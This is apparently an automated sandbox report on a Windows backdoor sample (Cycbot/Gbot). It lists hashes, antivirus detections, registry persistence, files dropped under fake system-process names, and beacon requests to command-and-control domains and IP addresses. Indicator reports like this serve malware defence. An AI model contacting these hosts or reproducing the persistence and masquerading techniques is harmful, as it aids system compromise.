Analysis Date: 2015-01-17 02:08:05
MD5: f5ce71be9e70019a03bad3f2328a6338
SHA1: a45418aa741ed7f2b58d3de9f68d0eb0e3acbfee

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: c0ea9326f1be81a02ea14e9dceb18c68 sha1: b93b7480a7ce766c10c86144cb862ba824122dc0 size: 117760
Section: .rdata md5: d36aca9b86c6d953ab422b8731de29fb sha1: 22df014b7fc5797a6c8e1b0b7e5a92e4374ab114 size: 1024
Section: .data md5: bfb966d7f513f16ca1ff26d7e642ba9c sha1: a6d8922f8d05b2e8829b53438a33cd69ff5acb50 size: 25088
Section: .rsrc md5: 350b5595b05aa28d22be3a3c24d02884 sha1: ed9420b6e11e9b6d101266aa1298d31a5ecb0243 size: 1024
Timestamp: 2005-09-17 03:48:23
Version: PrivateBuild: 1102
PEhash: e4339c0f08183c28d5e369e2d3971a7618631976
IMPhash: d296dd80736c7fdf0dadecd8baf5f02b
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV Authentium: W32/Goolbot.C.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Diple-19
AV Dr. Web: Trojan.Siggen2.11227
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.IVA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.C.gen!Eldorado
AV F-Secure: Trojan-Downloader:W32/Renos.GTC
AV Grisoft (avg): Agent.5.BJ
AV Ikarus: Packed.Win32.Krap
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.bs
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.e
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Rising: no_virus
AV Sophos: Troj/FakeAV-CDG
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: zoneck.com
Winsock DNS: www.google.com
Winsock DNS: motherboardstest.com
Winsock DNS: historykillerpro.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonejm.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: historykillerpro.com (Type: A) ➝ 192.185.245.93
DNS: motherboardstest.com (Type: A) ➝ 204.11.56.45
DNS: www.google.com (Type: A) ➝ 64.233.185.105
DNS: www.google.com (Type: A) ➝ 64.233.185.104
DNS: www.google.com (Type: A) ➝ 64.233.185.103
DNS: www.google.com (Type: A) ➝ 64.233.185.99
DNS: www.google.com (Type: A) ➝ 64.233.185.147
DNS: www.google.com (Type: A) ➝ 64.233.185.106
DNS: zoneck.com (Type: A) ➝ 208.79.234.132
DNS: zonejm.com (Type: A) ➝ 23.239.15.54
DNS: xibudific.cn (Type: A)
HTTP GET: http://historykillerpro.com/img/eslogo.gif?tq=gJ4WK%2FSUh6zGkER8oY%2BQrMWTUj26kJHjyZZTK%2B%2FbxWq1SfkIYVhX
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz2uw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51AortCC5IaGUUmp19LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2uw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2uw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbNQK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GET: http://motherboardstest.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq1ujbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GET: http://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq1ujbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP: 192.168.1.1:1032 ➝ 192.185.245.93:80
Flows TCP: 192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1034 ➝ 64.233.185.105:80
Flows TCP: 192.168.1.1:1035 ➝ 64.233.185.105:80
Flows TCP: 192.168.1.1:1036 ➝ 208.79.234.132:80
Flows TCP: 192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1038 ➝ 23.239.15.54:80
Flows TCP: 192.168.1.1:1039 ➝ 204.11.56.45:80
Flows TCP: 192.168.1.1:1040 ➝ 23.239.15.54:80

Raw Pcap

Strings